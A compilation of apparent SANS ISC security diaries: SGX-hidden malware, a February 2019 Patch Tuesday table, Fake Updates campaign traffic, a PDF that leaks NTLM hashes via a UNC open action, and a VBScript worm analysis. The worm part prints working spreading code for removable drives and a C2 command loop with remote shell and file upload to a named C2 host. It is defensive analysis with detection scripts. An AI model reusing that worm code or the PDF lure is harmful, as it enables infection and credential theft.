Information Security News
Intel Skylake die shot. (credit: Intel)
Researchers have found a way to run malicious code on systems with Intel processors in such a way that the malware can't be analyzed or identified by antivirus software, using the processor's own features to protect the bad code. As well as making malware in general harder to examine, bad actors could use this protection to, for example, write ransomware applications that never disclose their encryption keys in readable memory, making it substantially harder to recover from attacks.
The research, performed at Graz University of Technology by Michael Schwarz, Samuel Weiser, and Daniel Gruss (one of the researchers behind last year's Spectre attack), uses a feature that Intel introduced with its Skylake processors called SGX ("Software Guard eXtensions"). SGX enables programs to carve out enclaves where both the code and the data the code works with are protected to ensure their confidentiality (nothing else on the system can spy on them) and integrity (any tampering with the code or data can be detected). The contents of an enclave are transparently encrypted every time they're written to RAM and decrypted upon being read. The processor governs access to the enclave memory: any attempt to access the enclave's memory from code outside the enclave is blocked; the decryption and encryption only occurs for the code within the enclave.
SGX has been promoted as a solution to a range of security concerns when a developer wants to protect code, data, or both, from prying eyes. For example, an SGX enclave running on a cloud platform could be used to run custom proprietary algorithms, such that even the cloud provider cannot determine what the algorithms are doing. On a client computer, the SGX enclave could be used in a similar way to enforce DRM (digital rights management) restrictions; the decryption process and decryption keys that the DRM used could be held within the enclave, making them unreadable to the rest of the system. There are biometric products on the market that use SGX enclaves for processing the biometric data and securely storing it such that it can't be tampered with.
This month we got patches for 74 vulnerabilities in total. One of them has been exploited in the wild and two were made public before today.
The known exploited vulnerability (CVE-2019-0676) may lead to information disclosure and affects Internet Explorer 10 on Windows Server 2012 and Internet Explorer 11 on Windows 7, 8.1 and 10 and Windows Server 2008, 2012, 2016 and 2019.
Of the two previously disclosed vulnerabilities, one (CVE-2019-0636) may also lead to information disclosure and the other, CVE-2019-0686, is a privilege escalation vulnerability in Microsoft Exchange 2010, 2013, 2016 and 2019 (the "PrivExchange" issue covered by ADV190007). This vulnerability was well detailed by Bojan in this diary.
Last month, critical vulnerabilities affected the Microsoft DHCP Client. This time a critical vulnerability was fixed in the DHCP Server (CVE-2019-0626). If successfully exploited, it may allow an unauthenticated attacker to run arbitrary code on the DHCP server. Its CVSS v3 base score is 9.8 (out of 10).
Take a look at my dashboard for a more detailed breakdown: https://patchtuesdaydashboard.com
Description / CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
---|---|---|---|---|---|---|---|
.NET Framework and Visual Studio Remote Code Execution Vulnerability | |||||||
%%cve:2019-0613%% | No | No | Less Likely | Less Likely | Important | ||
.NET Framework and Visual Studio Spoofing Vulnerability | |||||||
%%cve:2019-0657%% | No | No | Less Likely | Less Likely | Important | ||
Azure IoT Java SDK Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0729%% | No | No | - | - | Important | ||
Azure IoT Java SDK Information Disclosure Vulnerability | |||||||
%%cve:2019-0741%% | No | No | - | - | Important | ||
February 2019 Adobe Flash Security Update | |||||||
ADV190003 | No | No | - | - | Critical | ||
February 2019 Oracle Outside In Library Security Update | |||||||
ADV190004 | No | No | - | - | |||
GDI+ Remote Code Execution Vulnerability | |||||||
%%cve:2019-0662%% | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.9 |
%%cve:2019-0618%% | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.9 |
Guidance for "PrivExchange" Elevation of Privilege Vulnerability | |||||||
ADV190007 | Yes | No | More Likely | More Likely | |||
Guidance to mitigate unconstrained delegation vulnerabilities | |||||||
ADV190006 | No | No | - | - | |||
HID Information Disclosure Vulnerability | |||||||
%%cve:2019-0600%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
%%cve:2019-0601%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
Internet Explorer Information Disclosure Vulnerability | |||||||
%%cve:2019-0676%% | No | Yes | More Likely | Detected | Important | 2.4 | 2.2 |
Internet Explorer Memory Corruption Vulnerability | |||||||
%%cve:2019-0606%% | No | No | - | - | Critical | 6.4 | 5.8 |
Jet Database Engine Remote Code Execution Vulnerability | |||||||
%%cve:2019-0625%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
%%cve:2019-0595%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
%%cve:2019-0596%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
%%cve:2019-0597%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
%%cve:2019-0598%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
%%cve:2019-0599%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
Latest Servicing Stack Updates | |||||||
ADV990001 | No | No | - | - | Critical | ||
Microsoft Browser Spoofing Vulnerability | |||||||
%%cve:2019-0654%% | No | No | More Likely | More Likely | Important | 2.4 | 2.2 |
Microsoft Edge Information Disclosure Vulnerability | |||||||
%%cve:2019-0643%% | No | No | - | - | Moderate | 4.3 | 3.9 |
Microsoft Edge Memory Corruption Vulnerability | |||||||
%%cve:2019-0645%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0650%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0634%% | No | No | - | - | Critical | 4.2 | 3.8 |
Microsoft Edge Security Feature Bypass Vulnerability | |||||||
%%cve:2019-0641%% | No | No | - | - | Moderate | 4.3 | 3.9 |
Microsoft Excel Information Disclosure Vulnerability | |||||||
%%cve:2019-0669%% | No | No | More Likely | More Likely | Important | ||
Microsoft Exchange Server Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0686%% | Yes | No | More Likely | More Likely | Important | ||
%%cve:2019-0724%% | No | No | - | - | Important | ||
Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability | |||||||
%%cve:2019-0671%% | No | No | Less Likely | Less Likely | Important | ||
%%cve:2019-0672%% | No | No | Less Likely | Less Likely | Important | ||
%%cve:2019-0673%% | No | No | Less Likely | Less Likely | Important | ||
%%cve:2019-0674%% | No | No | Less Likely | Less Likely | Important | ||
%%cve:2019-0675%% | No | No | - | - | Important | ||
Microsoft Office Security Feature Bypass Vulnerability | |||||||
%%cve:2019-0540%% | No | No | More Likely | More Likely | Important | ||
Microsoft SharePoint Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0668%% | No | No | - | - | Important | ||
Microsoft SharePoint Remote Code Execution Vulnerability | |||||||
%%cve:2019-0594%% | No | No | Less Likely | Less Likely | Critical | ||
%%cve:2019-0604%% | No | No | Less Likely | Less Likely | Critical | ||
Microsoft SharePoint Spoofing Vulnerability | |||||||
%%cve:2019-0670%% | No | No | - | - | Moderate | ||
Scripting Engine Elevation of Privileged Vulnerability | |||||||
%%cve:2019-0649%% | No | No | - | - | Important | 4.2 | 3.8 |
Scripting Engine Information Disclosure Vulnerability | |||||||
%%cve:2019-0648%% | No | No | - | - | Important | 4.3 | 3.9 |
%%cve:2019-0658%% | No | No | - | - | Important | 4.3 | 3.9 |
Scripting Engine Memory Corruption Vulnerability | |||||||
%%cve:2019-0607%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0610%% | No | No | - | - | Important | 4.2 | 3.8 |
%%cve:2019-0640%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0642%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0644%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0651%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0652%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0655%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0590%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0591%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0593%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0605%% | No | No | - | - | Critical | 4.2 | 3.8 |
Team Foundation Server Cross-site Scripting Vulnerability | |||||||
%%cve:2019-0743%% | No | No | Less Likely | Less Likely | Important | ||
%%cve:2019-0742%% | No | No | Less Likely | Less Likely | Important | ||
Visual Studio Code Remote Code Execution Vulnerability | |||||||
%%cve:2019-0728%% | No | No | Less Likely | Less Likely | Important | ||
Win32k Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0623%% | No | No | - | - | Important | 7.0 | 6.3 |
Win32k Information Disclosure Vulnerability | |||||||
%%cve:2019-0628%% | No | No | More Likely | More Likely | Important | 4.7 | 4.2 |
Windows DHCP Server Remote Code Execution Vulnerability | |||||||
%%cve:2019-0626%% | No | No | Less Likely | Less Likely | Critical | 9.8 | 8.8 |
Windows Defender Firewall Security Feature Bypass Vulnerability | |||||||
%%cve:2019-0637%% | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8 |
Windows GDI Information Disclosure Vulnerability | |||||||
%%cve:2019-0660%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
%%cve:2019-0664%% | No | No | - | - | Important | 4.7 | 4.2 |
%%cve:2019-0602%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
%%cve:2019-0615%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
%%cve:2019-0616%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
%%cve:2019-0619%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
Windows Hyper-V Information Disclosure Vulnerability | |||||||
%%cve:2019-0635%% | No | No | Less Likely | Less Likely | Important | 5.4 | 4.9 |
Windows Information Disclosure Vulnerability | |||||||
%%cve:2019-0636%% | Yes | No | More Likely | More Likely | Important | 5.5 | 5.1 |
Windows Kernel Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0656%% | No | No | - | - | Important | 4.7 | 4.2 |
Windows Kernel Information Disclosure Vulnerability | |||||||
%%cve:2019-0661%% | No | No | - | - | Important | 4.7 | 4.2 |
%%cve:2019-0621%% | No | No | More Likely | More Likely | Important | 5.5 | 5.0 |
Windows SMB Remote Code Execution Vulnerability | |||||||
%%cve:2019-0630%% | No | No | More Likely | More Likely | Important | 7.5 | 6.7 |
%%cve:2019-0633%% | No | No | More Likely | More Likely | Important | 7.5 | 6.7 |
Windows Security Feature Bypass Vulnerability | |||||||
%%cve:2019-0627%% | No | No | More Likely | More Likely | Important | 5.3 | 4.8 |
%%cve:2019-0631%% | No | No | More Likely | More Likely | Important | 5.3 | 4.8 |
%%cve:2019-0632%% | No | No | More Likely | More Likely | Important | 5.3 | 4.8 |
Windows Storage Service Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0659%% | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3 |
--
Renato Marinho
Morphus Labs | LinkedIn | Twitter
Introduction
Last week on 2019-02-06, @baberpervez2 tweeted about a compromised website used by the Fake Updates campaign. The Fake Updates campaign uses compromised websites that generate traffic to a fake update page. The type of fake update page depends on the victim's web browser: a fake Flash update page for Internet Explorer, a fake Chrome update page for Google Chrome, and a fake Firefox update page for Firefox. Victims download JavaScript (.js) files from these pages disguised as browser updates; the downloaded .js file instead installs malware on a vulnerable Windows host.
Patterns for infection traffic are relatively unchanged since this campaign was first reported on the Malwarebytes blog in April 2018.
I generated an infection from the Fake Updates campaign on Friday 2019-02-09 and again on Monday 2019-02-11. Both times, the final payload was a Chthonic banking Trojan. Today's diary reviews the infection I generated on Monday 2019-02-11.
Shown above: Flow chart for infection traffic from Monday 2019-02-11.
Screenshots
The following are screenshots of Fake Updates campaign traffic I generated from the initial compromised website at thetechhaus[.]com.
Shown above: Fake Chrome update page seen when thetechhaus[.]com was viewed in the Chrome web browser.
Shown above: You can ignore warnings, download, and run the malicious .js file on a vulnerable Windows host.
Shown above: The .js file shows highly-obfuscated script, which has always been the case for files from this campaign.
Shown above: Start of the infection chain traffic filtered in Wireshark.
Shown above: Redirect traffic to track.positiverefreshment[.]org that pointed to fake Chrome update page.
Shown above: Traffic for fake Chrome update page on 3aak.gotguardsecurity[.]com.
Shown above: HTTPS traffic to dl.dropboxusercontent.com that returned a malicious .js file.
Shown above: Traffic after running the .js file disguised as a Chrome update.
Shown above: Final payload (Chthonic banking Trojan) persistent on the infected Windows host.
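Because the chain keeps the same shape (compromised site, redirector, fake update page on a third host, .js handed out by a file-hosting service), its Referer trail is a usable detection pivot. The following is an added example and not part of this diary: it rebuilds the Referer chain for every .js fetched as a file download from constructed proxy records and flags chains that cross two or more unrelated sites before reaching the file host. The host names are the ones seen above; the log format, client addresses, paths, file name and the Dropbox leg being logged in clear (it was HTTPS in this infection) are assumptions made for the example.

```python
from collections import namedtuple
from urllib.parse import urlsplit

Record = namedtuple("Record", "ts client method url referer ctype")

# Constructed proxy log (assumed space-separated format: time, client, method,
# URL, Referer or '-', response Content-Type). Hosts are those from the diary;
# client IPs, paths, the .js file name and the clear-text Dropbox leg are
# assumptions for this example.
SAMPLE_LOG = """\
2019-02-11T15:02:01Z 10.0.0.5 GET http://thetechhaus.com/ - text/html
2019-02-11T15:02:02Z 10.0.0.5 GET http://track.positiverefreshment.org/s_code.js http://thetechhaus.com/ text/javascript
2019-02-11T15:02:03Z 10.0.0.5 GET http://3aak.gotguardsecurity.com/update/ http://thetechhaus.com/ text/html
2019-02-11T15:02:09Z 10.0.0.5 GET https://dl.dropboxusercontent.com/s/abc123/Chrome_Update.js http://3aak.gotguardsecurity.com/update/ application/octet-stream
2019-02-11T15:03:30Z 10.0.0.7 GET https://cdn.example.com/app.js https://www.example.com/ application/javascript
"""


def parse_log(text):
    """Turn the sample format into Record tuples; a Referer of '-' becomes None."""
    recs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, referer, ctype = line.split()
        recs.append(Record(ts, client, method, url, None if referer == "-" else referer, ctype))
    return recs


def base_domain(host):
    """Two-label approximation of the registrable domain (no public-suffix list here)."""
    return ".".join(host.lower().split(".")[-2:])


def referer_chain(index, rec, limit=8):
    """Walk Referer headers back to the first page; hosts are returned earliest first."""
    hosts = [urlsplit(rec.url).hostname]
    seen = {rec.url}
    while rec.referer and rec.referer not in seen and len(hosts) < limit:
        seen.add(rec.referer)
        hosts.insert(0, urlsplit(rec.referer).hostname)
        rec = index.get((rec.client, rec.referer))
        if rec is None:  # referring page was not logged (cached, or fetched earlier); stop
            break
    return hosts


def flag_fake_update_chains(log_text):
    """Flag .js files fetched as downloads whose Referer chain crosses two or more
    unrelated sites before the file host, and report the chain for triage."""
    recs = parse_log(log_text)
    index = {(r.client, r.url): r for r in recs}
    hits = []
    for r in recs:
        path = urlsplit(r.url).path.lower()
        # A script include is served as JavaScript; a file the user is meant to
        # save and run is served as an opaque download.
        if not path.endswith(".js") or r.ctype != "application/octet-stream":
            continue
        chain = referer_chain(index, r)
        upstream = {base_domain(h) for h in chain[:-1]} - {base_domain(chain[-1])}
        if len(upstream) >= 2:
            hits.append({"client": r.client, "download": r.url, "chain": chain})
    return hits


if __name__ == "__main__":
    for hit in flag_fake_update_chains(SAMPLE_LOG):
        print(hit["client"], " -> ".join(hit["chain"]))
```

Which legs are visible depends on TLS inspection: without it the HTTPS hops only appear as CONNECT requests with a host name, so the chain degrades to host names plus the Referer of the first plain-HTTP request, which is still enough to see an unrelated third-party page handing out a .js file.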
Indicators of Compromise (IoCs)
The following are indicators associated with the infection on Monday 2019-02-11.
Initial compromised site:
Redirect that led to fake Chrome update page:
Traffic for fake Chrome update page:
Download of .js file disguised as Chrome update:
Traffic generated by .js file:
Post-infection traffic caused by Chthonic banking Trojan:
Associated malware:
SHA256 hash: 9daa0dec909874316afe7f402e82d408b96b215a3501579849c792ec91cfe750
SHA256 hash: 4a17789f8a03fb2ec3185322ab879d436470d931e1fb98d0a4b9e5b68cda95ab
SHA256 hash: 7356424e04f730c7440f76cd822ff8645693b9835ae6aec4d6840cb1becae45c
Final words
Monday's infection was unusual, because everything except for the Dropbox URL was regular HTTP traffic. I more often find HTTPS traffic from the compromised site, redirect traffic, and fake update page. Usually the only HTTP traffic is generated by the downloaded .js file and final malware payload.
Pcap and malware samples for today's diary can be found here.
---
Brad Duncan
brad [at] malware-traffic-analysis.net
Yesterday I stumbled upon a PDF file that was flagged as suspicious by a customer's anti-malware solution and placed in quarantine. Later, the recipient contacted the team in charge of email to get access to his document because he knew the sender and claimed that the file was legit.
The file looked indeed safe and its content was properly related to the customer's business. I did a quick analysis of the file in my sandbox and, once the file was opened, Acrobat Reader attempted to connect to a remote SMB share. I extracted the objects from the PDF file and there was indeed a reference to an SMB share. When a Windows host is asked to connect to such a share, you immediately think about NTLM hash leaks.
Here is the object extracted from the PDF. The /AA /O entry is the page's open action: a /GoToE action whose /F target is a UNC path, so the reader tries to reach a share on the attacker's host as soon as the page is displayed:
obj 10 0
 Type: /Page
 Referencing: 9 0 R, 6 0 R, 11 0 R, 12 0 R, 13 0 R, 7 0 R, 2 0 R, 14 0 R, 1 0 R, 15 0 R, 16 0 R, 17 0 R, 18 0 R, 3 0 R, 19 0 R, 20 0 R

  <<
    /AA
      <<
        /O
          <<
            /F '(\\\\\\\\virtualofficestorage[.]com\\\\docs_share)'
            /D [ 0 /Fit]
            /S /GoToE
          >>
      >>
    /Parent 9 0 R
    /Contents [6 0 R 11 0 R 12 0 R 13 0 R 7 0 R]
    /Type /Page
    /Resources
      <<
        /ExtGState << /Xi1 2 0 R >>
        /XObject << /BG0 14 0 R /Xi0 1 0 R /CL 15 0 R >>
        /ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
        /Font << /F_2 16 0 R /F_0 17 0 R /F_1 18 0 R /Xi2 3 0 R >>
      >>
    /MediaBox [0 -0.02000 598.80 844.08]
    /Annots [19 0 R 20 0 R]
  >>
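A scanner for this pattern, as an added example that is not part of the diary: it walks every object, looks for file-targeting actions (/GoToE as here, plus /GoToR and /Launch, which also take an /F target), unescapes the PDF string and reports UNC targets together with what triggers them. The real file is not available, so the input is a constructed minimal PDF that carries the same page-open action as object 10 above; the host name is the one from the object, everything else in the sample is made up.

```python
import re

# Constructed sample, not the diary's file: a minimal PDF skeleton carrying the
# same /AA /O /GoToE action as object 10. In the raw file the string reads
# (\\\\host\\share); PDF string unescaping turns each \\ into one backslash.
SAMPLE_PDF = rb"""%PDF-1.4
9 0 obj
<< /Type /Pages /Kids [10 0 R] /Count 1 >>
endobj
10 0 obj
<< /Type /Page /Parent 9 0 R /MediaBox [0 0 598.80 844.08]
   /AA << /O << /F (\\\\virtualofficestorage.com\\docs_share) /D [0 /Fit] /S /GoToE >> >>
>>
endobj
11 0 obj
<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://example.invalid/) >> >>
endobj
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.DOTALL)
# A PDF literal string after /F; escaped parentheses are honoured, nesting is not.
FSTR_RE = re.compile(rb"/F\s*\(((?:[^()\\]|\\.)*)\)")
# Action types whose /F names a file (the diary's object uses /GoToE).
FILE_ACTIONS = (b"GoToE", b"GoToR", b"Launch")


def pdf_unescape(raw):
    """Resolve the PDF string escapes that matter here: doubled backslashes,
    escaped parentheses, \\n \\r \\t and octal character codes."""
    out = bytearray()
    i = 0
    while i < len(raw):
        c = raw[i]
        if c == 0x5C and i + 1 < len(raw):  # backslash
            nxt = raw[i + 1]
            if nxt in b"01234567":
                digits = re.match(rb"[0-7]{1,3}", raw[i + 1:]).group(0)
                out.append(int(digits, 8) & 0xFF)
                i += 1 + len(digits)
                continue
            out.append({ord("n"): 10, ord("r"): 13, ord("t"): 9}.get(nxt, nxt))
            i += 2
            continue
        out.append(c)
        i += 1
    return out.decode("latin-1")


def find_unc_actions(pdf):
    """Return every file action whose target is a UNC path, with its trigger."""
    hits = []
    for num, gen, body in OBJ_RE.findall(pdf):
        if re.search(rb"/AA\s*<<\s*/O\b", body):
            trigger = "page-open (/AA /O)"
        elif b"/OpenAction" in body:
            trigger = "document-open (/OpenAction)"
        else:
            trigger = "other"
        for m in FSTR_RE.finditer(body):
            # The action type lives in the same (innermost) dictionary as /F.
            start = body.rfind(b"<<", 0, m.start())
            end = body.find(b">>", m.end())
            dict_text = body[start:end if end != -1 else None]
            s = re.search(rb"/S\s*/(\w+)", dict_text)
            if not s or s.group(1) not in FILE_ACTIONS:
                continue
            target = pdf_unescape(m.group(1))
            unc = re.match(r"^(?:\\\\|//)([^\\/]+)[\\/](.*)$", target)
            if unc:
                hits.append({
                    "obj": f"{num.decode()} {gen.decode()}",
                    "action": s.group(1).decode(),
                    "trigger": trigger,
                    "host": unc.group(1),
                    "share": unc.group(2),
                })
    return hits


if __name__ == "__main__":
    for hit in find_unc_actions(SAMPLE_PDF):
        print(hit)
```

Whatever the document does, outbound SMB (TCP 445 and 139) from workstations to the Internet should be blocked at the edge: the leak only works if the reader's connection to the attacker's share actually completes.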
The domain virtualofficestorage[.]com[1] resolves to %%ip:185.225.17.98%%, located in Romania. Shodan indeed reports an SMB share:
Alas, it does not reply anymore (last seen on 2019-02-03). A website runs on this domain too, but it only serves the default Ubuntu Apache welcome page.
I can't share the file nor the hash, but did you notice the same behaviour with other PDF documents? Do you know more about this domain? (VT has only one reference to the same kind of document[2])
Please share!
[1] https://www.virustotal.com/#/domain/virtualofficestorage.com
[2] https://www.virustotal.com/#/file/746794ca49f497b43eb53a2fb25c4a0b3782002a45f498c047fa07d46cd43592/detection
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Another piece of malicious code spotted on GitHub this time. By the way, this is the perfect example to demonstrate that protecting users via a proxy with web-categorization is useless… Even sites from the Alexa Top-1M may deliver malicious content (GitHub's current position is 51[1]). The URL has been found in a classic email phishing attempt. The content had been recently uploaded (<24h) when I found it:
hxxps://raw.githubusercontent[.]com/sidilig/sharing/ebk-ci/Ebanking.zip
Let’s have a look at the archive content:
ISC $ shasum -a 256 Ebanking.zip
abb244010410ce6012bac9e4fc902432cfebe06724d014c63d9ef21f0a6b8b78  Ebanking.zip
ISC $ unzip -t Ebanking.zip
Archive:  Ebanking.zip
    testing: Mesures de sécurité.jar   OK
    testing: Habilitations Ebank.vbs   OK
No errors detected in compressed data of Ebanking.zip.
ISC $ shasum -a 256 *
d4ffa2acdec66f15c2252f36311c059ab00cc942b7cb54c33b4257dbc680ed9b  Habilitations Ebank.vbs
7ab54cb93a4a76dd5578f0b0ddcaeb8420311ebb39f27b62e535a43aec02523a  Mesures de sécurité.jar
Let’s have a look at the VBScript code. It’s based on a big class:
Class Values
    ...
End Class

Set myClass = new Values
myClass.Start()
Most of the code is obfuscated with a simple technique: a chunk of Base64 data in which every letter 'A' has been swapped for a junk string is restored by replacing that string with 'A' again, then decoded:
Private Function peter_paul(sand, way_off)
    Dim stapler, hp_pc, pillow, ruben
    stapler = "[email protected]"
    hp_pc = "A"
    pillow = "Q29uc3QgVHlw....."
    ruben = Replace(pillow, stapler, hp_pc)
    peter_paul = b642byt_arr(1, ruben, 10)
End Function
Easy to decode with Cyberchef:
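The same two steps scripted, as an added example that is not part of the diary or of the sample: the string constants and the Replace() call are read straight from a function of the shape shown above, so the decoder does not need to be told which variable holds the blob or the junk string. The junk string itself is not legible on the page (it is rendered as "[email protected]"), so the example uses a hypothetical one, and the second stage is a constructed script, not the real one.

```python
import base64
import re

# Hypothetical junk string standing in for the dropper's real one, which is not
# legible on the page. Anything outside the Base64 alphabet works as a stand-in.
TOKEN = "#q!"
# Constructed second stage (not the real one) so the round trip can be checked.
STAGE2 = 'Set fso = CreateObject("Scripting.FileSystemObject")\r\nWScript.Echo fso.GetSpecialFolder(2)'


def obfuscate_like_dropper(plain, token):
    """Reproduce the dropper's encoding: Base64, then every 'A' swapped for the junk string."""
    return base64.b64encode(plain.encode("utf-8")).decode("ascii").replace("A", token)


# Constructed function mirroring the shape of peter_paul() above, variable names
# kept, with the blob produced by obfuscate_like_dropper().
SAMPLE_FUNC = (
    "Private Function peter_paul(sand, way_off)\r\n"
    "    Dim stapler, hp_pc, pillow, ruben\r\n"
    f'    stapler = "{TOKEN}"\r\n'
    '    hp_pc = "A"\r\n'
    f'    pillow = "{obfuscate_like_dropper(STAGE2, TOKEN)}"\r\n'
    "    ruben = Replace(pillow, stapler, hp_pc)\r\n"
    "    peter_paul = b642byt_arr(1, ruben, 10)\r\n"
    "End Function\r\n"
)

# name = "literal" on a line of its own; VBScript doubles quotes inside literals.
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"]|"")*)"\s*$', re.M)
REPLACE_RE = re.compile(r"Replace\s*\(\s*(\w+)\s*,\s*(\w+)\s*,\s*(\w+)\s*\)", re.I)


def deobfuscate_vbs(src):
    """Recover the stage-2 script from a function of this shape.

    The string constants are read from the source; the Replace() call says which
    one is the blob, which is the junk string and which is its replacement. The
    result is Base64-decoded, which is the job b642byt_arr() does in the dropper.
    """
    consts = {m.group(1): m.group(2).replace('""', '"') for m in ASSIGN_RE.finditer(src)}
    call = REPLACE_RE.search(src)
    if call is None:
        raise ValueError("no Replace() call found")
    blob, junk, repl = (consts[name] for name in call.groups())
    return base64.b64decode(blob.replace(junk, repl)).decode("utf-8")


if __name__ == "__main__":
    print(deobfuscate_vbs(SAMPLE_FUNC))
```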
The decoded data is a new script. The next step is to execute it:
Public Sub Start()
    Set yhm_pepe = CreateObject("ADODB.Stream")
    Set spike = CreateObject("Microsoft.XMLDOM")
    If john_conor(1, peter_paul(0, False)) = ojor Then
        ExecuteGlobal ojor
    End If
End Sub
The decoded script is written to the ADODB.Stream, read back and executed with ExecuteGlobal. Here is what the second stage does. It copies itself to %TEMP%\tGcuACWROu.vbs for persistence. An interesting behaviour: it scans for removable drives (DriveType = 1)[2] and infects them, hiding the original files (hidden + system attributes) and dropping for each one a .lnk that launches both the worm and the original file:
for each drive in filesystemobj.drives
    if drive.isready = true then
        if drive.freespace > 0 then
            if drive.drivetype = 1 then
                filesystemobj.copyfile wscript.scriptfullname, drive.path & "\" & installname, true
                if filesystemobj.fileexists(drive.path & "\" & installname) then
                    filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
                end if
                for each file in filesystemobj.getfolder(drive.path & "\").Files
                    if not lnkfile then exit for
                    if instr(file.name, ".") then
                        if lcase(split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                            file.attributes = 2+4
                            if ucase(file.name) <> ucase(installname) then
                                filename = split(file.name, ".")
                                set lnkobj = shellobj.createshortcut(drive.path & "\" & filename(0) & ".lnk")
                                lnkobj.windowstyle = 7
                                lnkobj.targetpath = "cmd.exe"
                                lnkobj.workingdirectory = ""
                                lnkobj.arguments = "/c start " & replace(installname, " ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name, " ", chrw(34) & " " & chrw(34)) & "&exit"
                                filleicon = shellobj.regread("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, "."))) & "\") & "\defaulticon\")
                                if instr(fileicon, ",") = 0 then
                                    lnkobj.iconlocation = file.path
                                else
                                    lnkobj.iconlocation = fileicon
                                end if
                                lnkobj.save()
                            end if
                        end if
                    end if
                next
Once installed, it starts communicating with its C2 server at hxxp://ghanaandco.sytes[.]net:3007. The beacon is an empty POST to /is-ready; the host fingerprint travels in the User-Agent header, with fields separated by "<|>":
POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: fr-be
User-Agent: 647B5904<|>PLAYBOX1<|>Xavier<|>Microsoft Windows XP Professional<|>plus<|>nan-av<|>false - 15/02/2019
Accept-Encoding: gzip, deflate
Host: ghanaandco.sytes.net:3007
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Here is a reply from the C2 server:
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Content-Length: 12
Server: Indy/9.0.18

sleep<|>5000
Here is the main loop waiting for commands:
while true
    install
    response = ""
    response = post("is-ready", "")
    cmd = split(response, spliter)
    select case cmd(0)
        case "excecute"
            param = cmd(1)
            execute param
        case "update"
            param = cmd(1)
            oneonce.close
            set oneonce = filesystemobj.opentextfile(installdir & installname, 2, false)
            oneonce.write param
            oneonce.close
            shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
            wscript.quit
        case "uninstall"
            uninstall
        case "send"
            download cmd(1), cmd(2)
        case "site-send"
            sitedownloader cmd(1), cmd(2)
        case "recv"
            param = cmd(1)
            upload (param)
        case "enum-driver"
            post "is-enum-driver", enumdriver
        case "enum-faf"
            param = cmd(1)
            post "is-enum-faf", enumfaf(param)
        case "enum-process"
            post "is-enum-process", enumprocess
        case "cmd-shell"
            param = cmd(1)
            post "is-cmd-shell", cmdshell(param)
        case "delete"
            param = cmd(1)
            deletefaf (param)
        case "exit-process"
            param = cmd(1)
            exitprocess (param)
        case "sleep"
            param = cmd(1)
            sleep = eval(param)
    end select
    wscript.sleep sleep
wend
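Both sides of this exchange are simple enough to parse for detection, so here is an added example (not part of the diary) that does it over the beacon and reply captured above: the request is recognised as an H-Worm beacon from the /is-ready path, the empty body and the "<|>"-separated User-Agent, the fingerprint fields are split out, and a reply body is split into verb and arguments the same way the worm's main loop does. The field names are an interpretation of the beacon's order, not something the page states; the CRLF line endings of the captured request are reconstructed.

```python
SEP = "<|>"  # field separator used by both the beacon and the C2 replies

# Names for the User-Agent fields, in the order seen in the beacon above. The
# meaning of each field is an interpretation made for this example.
BEACON_FIELDS = ("volume_serial", "hostname", "username", "os", "variant", "antivirus", "usb_spread")

# Verbs handled by the main loop above (the misspelt "excecute" is the worm's own).
KNOWN_COMMANDS = {
    "excecute", "update", "uninstall", "send", "site-send", "recv", "enum-driver",
    "enum-faf", "enum-process", "cmd-shell", "delete", "exit-process", "sleep",
}

# The beacon from the diary, with CRLF line endings reconstructed.
SAMPLE_BEACON = (
    "POST /is-ready HTTP/1.1\r\n"
    "Accept: */*\r\n"
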